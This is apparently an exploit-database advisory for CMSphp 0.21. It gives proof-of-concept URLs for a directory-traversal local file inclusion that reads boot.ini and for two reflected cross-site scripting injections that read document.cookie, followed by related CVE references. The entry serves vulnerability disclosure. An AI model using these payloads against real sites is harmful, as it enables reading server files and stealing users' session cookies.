Lucene search
SirGodEDB-ID:9311HistoryJul 30, 2009 - 12:00 a.m.
cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting
2009-07-3000:00:00
SirGod
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
###################################################################################################
[+] CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
###################################################################################################
[+] Download : http://sourceforge.net/projects/cmsphp/
[+] Local File Inclusion
- PoC
http://127.0.0.1/path/modules.php?name=Your_account&mod_file=../../../../../../boot.ini%00
[+] Cross-Site Scripting
- PoC's
http://127.0.0.1/path/index.php?cook_user=<script>alert(document.cookie)</script>
http://127.0.0.1/path/modules.php?name=<script>alert(document.cookie)</script>
###################################################################################################
# milw0rm.com [2009-07-30]Related
cvelist
cvelist
CVE-2009-3506
2009-10-01 14:00:00
CVE-2009-3507
2009-10-01 14:00:00
cve
cve
CVE-2009-3506
2009-10-01 14:30:01
CVE-2009-3507
2009-10-01 14:30:01
nvd
nvd
CVE-2009-3506
2009-10-01 14:30:01
CVE-2009-3507
2009-10-01 14:30:01
prion
prion
Directory traversal
2009-10-01 14:30:00
Cross site scripting
2009-10-01 14:30:00